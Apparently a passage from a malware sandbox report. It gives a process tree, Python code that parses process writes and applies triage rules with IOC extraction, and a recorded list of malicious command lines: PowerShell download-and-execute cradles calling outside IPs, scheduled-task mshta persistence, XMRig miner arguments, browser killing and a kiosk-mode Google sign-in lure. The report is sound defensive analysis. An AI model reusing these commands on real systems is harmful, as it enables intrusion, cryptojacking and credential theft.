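PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2816 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4960 wrote to memory of 3928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 372 wrote to memory of 4960 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3928 wrote to memory of 3380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
"""

# Paths in this table carry no spaces, but the lazy first group still splits
# correctly on the first " C:\" even if the source image path contained one.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) (\S+) (C:\\.*?) (C:\\.*)$")


def parse_rows(text):
    """De-duplicated (src_pid, src_image, dst_pid, dst_image) tuples, first-seen order."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src_pid, dst_pid, _indicator, src_img, dst_img = m.groups()
            edges.setdefault((int(src_pid), src_img, int(dst_pid), dst_img), None)
    return list(edges)


def pid_reuse(edges):
    """PIDs seen with more than one image: the sandbox recycled them, so a
    bare PID is not a stable process identity anywhere in this report."""
    images = defaultdict(set)
    for sp, si, dp, di in edges:
        images[sp].add(si)
        images[dp].add(di)
    return {pid: sorted(imgs) for pid, imgs in images.items() if len(imgs) > 1}


def build_tree(edges):
    """Children map keyed on (pid, image); roots are nodes nobody wrote to."""
    children, nodes, has_parent = defaultdict(list), {}, set()
    for sp, si, dp, di in edges:
        src, dst = (sp, si), (dp, di)
        nodes.setdefault(src, None)
        nodes.setdefault(dst, None)
        children[src].append(dst)
        has_parent.add(dst)
    return children, [n for n in nodes if n not in has_parent]


def render(children, roots, depth=0):
    """Indented one-line-per-process view, image basename only."""
    out = []
    for node in roots:
        out.append("  " * depth + f"{node[0]} {node[1].rsplit(chr(92), 1)[-1]}")
        out.extend(render(children, children.get(node, []), depth + 1))
    return out


def chain(edges, target):
    """PIDs from the root down to target, walking the write edges backwards.
    The membership check stops a PID-collision from looping forever."""
    parent = {(dp, di): (sp, si) for sp, si, dp, di in edges}
    path = [target]
    while path[-1] in parent and parent[path[-1]] not in path:
        path.append(parent[path[-1]])
    return [pid for pid, _ in reversed(path)]


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    print("\n".join(render(*build_tree(edges))))
    print("recycled PIDs:", pid_reuse(edges))
```

The rows carry no timestamps, so (PID, image) is the best identity the report allows; two processes sharing both PID and image name would still be merged, which is why the rendered tree should be read next to the Processes list below rather than on its own.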

Uses Task Scheduler COM API

persistence
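The Processes list that follows records the command lines carrying the actual tradecraft: a schtasks/mshta loop re-running an .hta every 25 minutes, two PowerShell download cradles pulling from 45.144.212.77:16000 and 176.113.115.7, XMRig arguments executing under notepad.exe (the same image that requests SeLockMemoryPrivilege in the token table above, which XMRig needs for large pages), taskkill against five browsers followed by a Firefox --kiosk window whose URL embeds a Google sign-in path, and the csc.exe/cvtres.exe pair that PowerShell's Add-Type produces. The Python below is an added example, not one of the sandbox's own signatures: it runs simple triage rules over records copied from that list and extracts the IOCs; rule names and heuristics are this example's own. One rule also catches the loader's own bug: `$env:temp+'ZZ4155...'` has no path separator, which is why that payload executes from C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE while the second cradle (`$env:temp+'\483d...'`) lands inside Temp proper.

```python
"""Triage rules over the command lines recorded under Processes, plus IOC
extraction. RECORDS are (image, command line) pairs copied from the report;
rule names, heuristics and thresholds are this example's own."""
import re

RECORDS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"'''),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'''C:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f'''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    (r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 2"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r'''"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"'''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'''),
    (r"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE",
     r'''"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"'''),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'''schtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f'''),
    (r"C:\Windows\System32\notepad.exe",
     "--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40"),
    (r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM firefox.exe /T"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'''"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking'''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
]

MINER_RE = re.compile(r"--donate-level|--cpu-max-threads-hint|\s-o\s+\S+:\d+\s+-u\s+\S+")
# --kiosk pointing at a URL whose query string carries a second URL.
KIOSK_RE = re.compile(r'--kiosk\s+"?https?://\S+?\?\S*https?://')
# "\Temp" glued to the file name, or $env:temp+' with no backslash after the quote.
TEMP_CONCAT_RE = re.compile(r"\\Temp[A-Za-z0-9]|\$env:temp\+'[^\\]", re.I)
BROWSERS = ("firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe")


def _download_cradle(img, cmd):
    c = cmd.lower()
    fetch = any(k in c for k in ("downloadfile(", "downloadstring(", "invoke-webrequest"))
    run = any(k in c for k in ("start-process", "invoke-expression", "iex ", " -file "))
    return "powershell" in c and fetch and run


RULES = [
    ("schtasks_mshta_persistence", lambda img, cmd: all(k in cmd.lower() for k in ("schtasks", "/create", "mshta"))),
    ("powershell_download_cradle", _download_cradle),
    ("miner_args_in_foreign_image", lambda img, cmd: bool(MINER_RE.search(cmd)) and not img.lower().endswith("xmrig.exe")),
    ("browser_kill", lambda img, cmd: "taskkill" in cmd.lower() and any(b in cmd.lower() for b in BROWSERS)),
    ("kiosk_browser_nested_url", lambda img, cmd: bool(KIOSK_RE.search(cmd))),
    ("powershell_random_name", lambda img, cmd: "get-random" in cmd.lower() and "-join" in cmd.lower()),
    ("csc_addtype_compile", lambda img, cmd: img.lower().endswith("csc.exe") and "/noconfig" in cmd and ".cmdline" in cmd.lower()),
    ("temp_path_missing_separator", lambda img, cmd: bool(TEMP_CONCAT_RE.search(img + " " + cmd))),
]

URL_RE = re.compile(r"""https?://[^\s'"]+""")
TASK_RE = re.compile(r'/tn\s+"?([^\s"]+)')
POOL_RE = re.compile(r"-o\s+(\S+:\d+)\s+-u\s+(\S+)")


def classify(image, cmdline):
    """Every rule name that fires for one (image, command line) record."""
    return [name for name, pred in RULES if pred(image, cmdline)]


def triage(records):
    """Record index -> tags, omitting records that fire nothing."""
    result = {}
    for i, (img, cmd) in enumerate(records):
        tags = classify(img, cmd)
        if tags:
            result[i] = tags
    return result


def extract_iocs(records):
    """URLs, scheduled-task names, mining pools and wallets seen in the command lines."""
    iocs = {"urls": set(), "tasks": set(), "pools": set(), "wallets": set()}
    for _img, cmd in records:
        iocs["urls"].update(URL_RE.findall(cmd))
        iocs["tasks"].update(TASK_RE.findall(cmd))
        for pool, wallet in POOL_RE.findall(cmd):
            iocs["pools"].add(pool)
            iocs["wallets"].add(wallet)
    return iocs


if __name__ == "__main__":
    for i, tags in triage(RECORDS).items():
        print(RECORDS[i][0].rsplit(chr(92), 1)[-1], tags)
    print(extract_iocs(RECORDS))
```

The rules are deliberately substring-level so they survive the quoting differences between the cmd.exe-wrapped and direct schtasks invocations above; on a real endpoint the miner rule should additionally key on the image (notepad.exe has no business holding a pool URL) and the kiosk rule on the parent (a loader, not the user, launching firefox.exe).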

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe

"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"

C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe

"C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE

"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\4buU3vPam.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4784 -ip 4784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 820

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\rjbum\abfjdu.exe

C:\ProgramData\rjbum\abfjdu.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe

"C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"

C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe

"C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"

C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe

"C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3219f9b-7f74-406f-9bf8-d68635766d42} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c09d46-e774-4e15-ae93-1616266d2440} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 1436 -prefMapHandle 2628 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f67990-34d8-4010-9f43-2286c1a1ceb5} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3dc32dc-7c8f-4fd4-a5d9-9af212b745cc} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 32854 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3abcb1-6eae-4a53-95b8-d1042466a2de} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 4696 -prefMapHandle 5180 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5ed142-abae-401c-8b7c-ee583ef0bbd4} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653f8cec-3367-4821-af54-fec38fe8fcf9} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22b891f-18d5-4a40-acaf-52150da83d07} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab

C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe

"C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92EF.tmp\92F0.tmp\92F1.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4912"

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwm4ybui\jwm4ybui.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD5B.tmp" "c:\Users\Admin\AppData\Local\Temp\jwm4ybui\CSCD9F6A0106DC94F429C6CF68E69297485.TMP"

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4300 -ip 4300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 800

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

